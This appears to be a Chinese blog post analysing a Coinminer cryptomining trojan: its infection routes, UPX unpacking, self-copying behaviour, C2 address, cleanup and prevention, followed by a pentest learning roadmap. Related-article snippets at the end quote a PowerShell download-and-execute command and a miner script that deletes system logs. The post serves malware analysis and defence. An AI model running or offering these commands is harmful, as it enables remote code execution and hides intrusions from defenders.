我猜你还不知道什么是挖矿木马?

最新推荐文章于 2025-05-16 12:56:39 发布
最新推荐文章于 2025-05-16 12:56:39 发布
阅读量883 收藏 13
点赞数 15
文章标签: 网络 web安全 网络安全 安全 木马 黑客 网络安全学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81533492/article/details/138617754
版权

目录

自查挖矿木马

样本基本信息

​编辑 木马功能分析

该木马的清理

​编辑预防防护中挖矿样本

网络安全学习路线 (2024最新整理)

学习资料的推荐

1.视频教程

 2.SRC技术文档&PDF书籍 

3.大厂面试题    

特别声明:

挖矿木马木马木马主要就是通过利用各种手段,将挖矿程序植入到用户的计算机中,在用户不知情的情况下,偷偷利用用户的计算机进行执行挖矿功能,从而获取收益。

以下情况是用户中木马的高频事件:

1.用户往往在不注意的时候,下载并运行了来历不明的破解软件或不安全软件;

2.用户点击运行了钓鱼邮件中的附件的文件;

3.用户没有做好系统及时更新,通过系统漏洞传播;

4.用户浏览了植入挖矿脚本的网页,浏览器就解析脚本进行挖矿。

现在的挖矿木马存在种类非常多常见的如:普通开源的挖矿程序、无文件模式的挖矿程序、网页模式的挖矿程序、驱动模式的挖矿程序、Docker 模式的挖矿程序。

自查挖矿木马

1.cpu 的使用率,中了挖矿木马,因为会在系统中运行挖矿程序,使得计算机在正常运行下会变得非常卡顿,并且 CPU 的使用率会变得非常高,甚至会达到 100%。

2.通过杀毒软件进行全盘查杀,如果计算机中有存在挖矿木马的样本程序,杀毒软件一般情况下是可以查杀。

3.通过抓包工具(Wireshark)进行查看分析流量,从流量中去分析排查可疑的流量数据包。

样本基本信息

通过 hash 工具获取都挖矿木马样本的 MD5、SHA1、CRC32 数据。

该挖矿样本是控制台窗口的应用程序,通过 ExeInfo PE 工具中的区段信息,可以看出该样本采用了 UPX 压缩壳进行对样本保护,并且该样本程序是 64 位的应用程序。

 

通过火绒病毒查杀软件,进行扫描查杀该样本程序,可以从下图看到,该样本是属于 Coinminer 团伙研发的挖矿病毒样本程序。

 木马功能分析

分析样本需要工具:虚拟机 VMware、IDA、X64dbg、pchunter、WireShark 等工具。脱 UPX 压缩壳方法:单步调试法、内存访问断点法、堆栈平衡法。

通过单步调试法进行脱 UPX 壳,样本加载进 x64dbg 工具后,就单步 F8 方式,一直单步运行,通过观察程序的相对地址,直到跳转到原程序的 OEP 位置。那么再将内存数据 dump 下来就可以了。

样本的主要功能:通过循环遍历创建控制台文件,写入数据到文件,启动控制台文件。通过利用系统函数 CreateFileW 进行创建文件名称设置为 7 个字母的随机名称的文件,并通过 WriteFile 函数,将原始样本内数据拷贝到新创建的进程文件中,最后通过调用系统函数 CreateProcessW 函数进行启动样本。

 下图是 x64dbg 调试工具中执行 CreateFileW 进行创建文件。

拼接生成的随机文件名称。

 已在指定的目录下成功的生成了应用程序。

 最后在通过调用 CreateProcessW 进行启动创建的应用程序。

 执行完以上功能后,最终的效果如下图所示。

通过拼接 json 格式,并以 http 协议方式进行发送数据。

 从上面的 json 格式中可以很清晰看到 访问请求的 ip 地址很端口号:3.120.98.217:8080。接下来反查这个 ip 地址信息,可以看到这个 ip 地址指向的是德国的。

 

在通过 360 威胁情报中心https://ti.360.cn/#/homepage进行更详细查询这个 ip 地址相关的信息。从下图可以看到这个 ip 地址是属于 Coinminer 家族的 挖矿样本,并且查询到的相关联的样本也并不少。

该木马的清理

通过将 C:\Windows\system\目录下,所有随机名称的应用程序文件进行删除。就可以清除掉这个挖矿样本所遗留的应用程序。


预防防护中挖矿样本

1.在计算机中安装病毒查杀软件(火绒、360 杀毒),并及时更新病毒查杀软件的病毒库,还需做好定时全盘查杀病毒。

2.及时做好计算机系统补丁的更新。

3.服务器、主机、数据库等使用高强度的密码口令,切勿使用弱口令,防止被暴力破解。

4.网络上不要去随意下载、运行来历不明的程序或者破解程序,不随意点击来历不明的链接。

 

网络安全学习路线 (2024最新整理)

 如图片过大被平台压缩导致看不清的话,评论区点赞和评论区留言扣1或者关注我我后台会主动发给你! 

第一阶段:安全基础

网络安全行业与法规

Linux操作系统

计算机网络

HTML PHP Mysql Python基础到实战掌握

  第二阶段:信息收集

IP信息收集

域名信息收集

服务器信息收集

Web网站信息收集

Google hacking

Fofa网络安全测绘

 第三阶段:Web安全 

SQL注入漏洞

XSS

CSRF漏洞

文件上传漏洞

文件包含漏洞

SSRF漏洞

XXE漏洞

远程代码执行漏洞

密码暴力破解与防御

中间件解析漏洞

反序列化漏洞

 第四阶段:渗透工具 

MSF

Cobalt strike

Burp suite

Nessus   Appscea   AWVS

Goby   XRay

Sqlmap

Nmap

Kali

 第五阶段:实战挖洞 

漏洞挖掘技巧

Src

Cnvd

众测项目

热门CVE漏洞复现

靶场实战

学习资料的推荐

学习框架已经整理完毕,现在就差资料资源了,我这里整理了所有知识点对应的资料资源文档,大家不想一个一个去找的话,可以参考一下这些资料!

1.视频教程

 2.SRC技术文档&PDF书籍 

3.大厂面试题    

特别声明:

此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。

【云原生系列】云原生下的网络安全如何防御?
wanghuichen的博客
07-14 6560
云原生下的网络安全如何防御? OneDNS来解决!
挖矿木马简单分析
AlwaysBetter
07-27 1961
#!/bin/sh #更改当前进程最大打开文件数为65535 ulimit -n 65535 #删除linux下系统关键日志信息 rm -rf /var/log/syslog #给chattr最高权限 chattr (chattr可以修改文件隐藏属性,如可删除) chmod 777 /usr/bin/chattr chmod 777 /bin/chattr # -iua i:只许修改,允许建立和删除 u删除文件会保存,以后可以恢复 a只允许建立和修改,允许删除 # -iua 和 + 相反 去除文件
什么是挖矿木马?我你还知道
热门推荐
2201_75735270的博客
11-15 1万+
挖矿木马主要就是通过利用各种手段,将挖矿程序植入到用户的计算机中,在用户知情的情况下,偷偷利用用户的计算机进行执行挖矿功能,从而获取收益。1.用户往往在注意的时候,下载并运行了来历明的破解软件或安全软件;2.用户点击运行了钓鱼邮件中的附件的文件;3.用户没有做好系统及时更新,通过系统漏洞传播;4.用户浏览了植入挖矿脚本的网页,浏览器就解析脚本进行挖矿
记一次linux挖矿木马的处置
beichenyyds的博客
09-15 5074
linux服务器挖矿木马处置
挖矿病毒之CoinMiner入侵SQLServer
黑白的博客
06-26 7624
挖矿病毒之CoinMiner入侵SQLServer
服务器被植入挖矿程序 该怎么查杀挖矿病毒
网站安全专家
06-06 9109
阿里云ECS服务器是目前很多网站客户在使用的,可以使用同系统在服务器中,windows2008 windows2012,linux系统都可以在阿里云服务器中使用,前段时间我们SINE安全收到客户的安全求助,说是收到阿里云的短信提醒,提醒服务器存在挖矿进程,请立即处理的安全告警。客户网站都无法正常的打开,卡的连服务器SSH远程连接都进去,给客户造成了很大的影响。 随即我们SINE安全工程师...
这些黑客经常挂在嘴边的“黑话”,你知道多少?
02-28 7357
网安安全作为一个入门门槛较高的领域,大量的专业术语还是让人如读“黑话”般的想抓耳挠腮,本文盘点了超过200个常用的网络安全词汇,看看你是否都了解呢? 很多人学习python,知道从何学起。 很多人学习python,掌握了基本语法过后,知道在哪里寻找案例上手。 很多已经做案例的人,却知道如何去学习更加高深的知识。 那么针对这三类人,我给大家提供一个好的学习平台,免费领取视频教程,电子书籍,以及课程的源代码!QQ群:721195303 一、攻击篇 1.攻击工具 肉鸡 所谓“肉鸡”..
被动抓病毒的日子(1)【入侵大佬:198.46.202.146】 一种针对Linux服务器疑似挖矿病毒流入
谦怀
03-09 2463
拥有云服务器(尤其是阿里云服务器)的朋友们要注意了!又一种针对Linux服务器疑似挖矿病毒流入,赶紧检查一下吧! 2021年3月8号,发现疑似挖矿病毒的流氓程序入侵,对于平常疏于安全防范的公司敲响了一记警钟。现在就详细分析下病毒的运作逻辑,至于它是干嘛的,有兴趣的小伙伴可以去挖掘一下,也许有比较有趣的收获。 目录 一、概述 二、脚本分析 1:声明和重写内核模块 2:杀死对应服务 3:卸载云盾服务器安全(安骑士)服务 4:生成默认环境变量 5:生成定时任务 6:登录方法声明 7:lib.
恶意代码分析
aming小老弟
12-09 1594
著名防火墙公司Palo Alto Networks近日在官网公布了一个CVE-2024-3400的漏洞信息,该漏洞存在于部分PAN-OS系统的GlobalProtect功能中,在某些配置打开的情况下,攻击者可以对运行该系统的设备进行未授权RCE,并且拿到系统的root权限。A5.这一恶意代码会使用高层API函数连接到一个远程的FTP服务器,我们可以下载并建立一个本地FTP服务器,并将DNS请求重定向至这一服务器,以充分分析该恶意代码。所以,其一旦广泛传播开便极难彻底清除。然后启动lab20-2.exe。
浅谈你们根本懂的区块链游戏
weixin_42203089的博客
05-14 3585
原文发表在微信公众号:DappReview作者:Vincent, DappReview CEO编辑:米芽  复盘过去十年,站在每一个时间节点都有大大小小机会。而往前看,似乎却一片迷茫。 本文以一个深度参与者的身份,用寥寥几千字,试图还原区块链游戏在过去半年的发展,并探讨区块链给游戏带来的价值,给开发者的挑战,以及最终回归游戏的本质。先讲讲认知门槛上面两张图解释一下:第一张是13年初在一个微信群里我...
服务器被植入挖矿程序
Fight_Rain的博客
06-11 6372
在阿里云管控台看到有两台服务器cpu使用率一直在100左右,而平时只有到1 解决1: 连到服务器,top命令发现wipefs进程占用大量cpu资源,先kill掉该进程,再删除一些文件,具体参考https://www.cnblogs.com/liuchuyu/p/7490338.html,删除时可能遇到Operation not permitted,一般是文件属性为 —i———-,先cha...
记一次虚机被植入挖矿程序的处理
b379685397的博客
12-16 1967
挖矿程序发现 这两天在研究大数据的数据同步工具时,发现数据同步非常慢,数据库数量很小,但是同步了10几分钟都没有同步结束,于是登录虚机查看了下机器状态。 执行top命令发现有个进程名叫biden1的任务,把CPU占满了。但我影像中应该没有运行这种东西,虚机状态检查也没有病毒和木马,于是怀疑被人植入挖矿程序了。 执行kill -9 9102 命令杀掉,之后几分钟后线程又启动起来了。于是开启了和挖矿程序战斗的路程。 定时任务检查 一般进程定时启动都会放在定时任务上。因此先从虚机的定时任务入手,一般
服务器是如何被植入挖矿程序的
Amy安的博客
08-17 2386
首先,攻击者利用Sqlserver应用的弱口令漏洞,并借助Sqlserver自身的命令执行组件执行cmd命令 "C:\Windows\system32\cmd.exe" /c whoami whoami是操作系统中用于查看当前有效用户名的命令 执行ps命令 powershell -c "iex((new-object Net.WebClient).DownloadString('恶意链接'))" or "C:\Windows\system32\cmd.exe" /c powershell -c "iex(
linux服务器被植入木马挖矿程序的解决过程记录。
weixin_38067745的博客
12-24 4966
今天我的网站突然无法访问,我马上进入服务器排查情况。用top命令查看进程,发现有某个进程的cpu使用率到达90%以上,而这个进程并是我启动的。我怀疑这个进程是个木马程序,于是我用kill -9 【进程id】把该进程杀掉。发现没过多久该进程又启动了。我反复试了几次还是行,于是更加断定我的怀疑了。 经过老大的提醒,有可能是redis的漏洞导致被攻击,我马上...
BGP联邦实验
xy021111的博客
05-13 487
1.AS1存在两个环回,一个地址为192.168.1.0/24,该地址能再任何协议中宣告AS3存在两个环回,一个地址为192.168.2.0/24,该地址能再任何协议中宣告AS1还有一个环回地址为10.1.1.0/24,AS3另一个环回地址是11.1.1.0/24最终要求这两个环回可以互相通讯。2.整个AS2的IP地址为172.16.0.0/163.AS间的骨干链路Ip地址随意分配4.使用BGP协议让整个网络所有设备的环回可以互相访问5.减少路由条目数量,避免环路出现。
转发多台px4仿真UDP数据到地面站
龙猫的博客
05-13 603
在上述代码中,UDP 在接收时是用到此ip的,也就是 gcs_sock.bind(('', gcs_tx_port)),函数中的 ip 可以填,只需要将端口号填对即可,但在发送时,需要指定 ip,而且在给飞控发送心跳时,需要绑定端口号为飞机的端口号。,因此,需要编写一个脚本在主机运行,接收 wsl 中仿真飞机的数据,通过主机的 ip 与端口发送给 app 的主机 ip 与端口(),并且,接收 app 的命令,转发给三台飞机(命令中会包含飞机id,因此脚本需要做筛选,直接转发给三个即可)。
k8s之LoadBalancer Service 解析
woshihlf的博客
05-12 667
Cluster IP (10.233.50.2):External IP (显示为 ):服务暴露了多个端口,每种端口有同的含义:Service Port (如9091/TCP):TargetPort (如9091/TCP):NodePort (如19650/TCP):当前服务暴露了4个端口组: 每组格式为:通过Cluster IP: 通过服务DNS名 (在同一个命名空间): 集群外部连接 通过NodePort (当外部IP未分配时): 通过LoadBalancer IP (当外部IP分
HTTP协议
2401_85487314的博客
05-13 654
简介 工作原理 HTTP请求
nnUNet V2修改网络——暴力替换网络为UCTransNet
最新发布
w1ndfly的博客
05-16 141
直接替换掉nnU-Net V2原有的U-Net,抛弃自适应网络设计,符合2d配置
windows挖矿木马
09-08
对于 Windows 系统的挖矿木马,以下是一些常见的问题和解决方案: 1. 如何防止 Windows 系统感染挖矿木马? - 安装有效的杀毒软件,并始终保持其更新。 - 避免从可信的来源下载和安装软件。 - 及时更新 Windows 操作系统和其他软件补丁。 2. 如何检测和删除挖矿木马? 运行杀毒软件全面扫描系统,确保其能检测并删除挖矿木马。 - 使用安全软件或工具来检测和清除恶意文件和注册表项。 - 对可疑进程和网络连接进行检查,并关闭或删除它们。 3. 如果我怀疑自己的系统被感染了,该怎么办? - 立即运行杀毒软件进行系统扫描。 - 如果杀毒软件无法解决问题,可以尝试使用专门的挖矿木马清除工具。 - 如果问题仍然存在,可以考虑重装操作系统来清除感染。 请注意,这些只是一些基本的建议。如果你遇到了一个真实的威胁,最好咨询专业人士或技术支持来帮助你解决问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值